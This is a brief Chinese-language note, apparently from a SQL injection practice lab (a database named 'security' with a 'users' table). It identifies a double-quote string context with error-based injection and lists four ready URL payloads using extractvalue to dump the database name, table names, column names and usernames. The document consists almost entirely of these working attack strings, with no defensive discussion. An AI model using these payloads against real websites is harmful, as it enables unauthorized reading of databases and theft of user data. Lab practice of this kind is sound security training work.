同样也是报错注入,是双引号字符型注入
爆库:
?id=1" and extractvalue(1,concat(0x23,database(),0x23)) --+
爆表:
?id=1" and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x23)) --+
爆列:
?id=1" and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_name='users' limit 12,1),0x23)) --+
爆数据:
?id=1" and extractvalue(1,concat(0x23,(select username from users order by id limit 0,1),0x23)) --+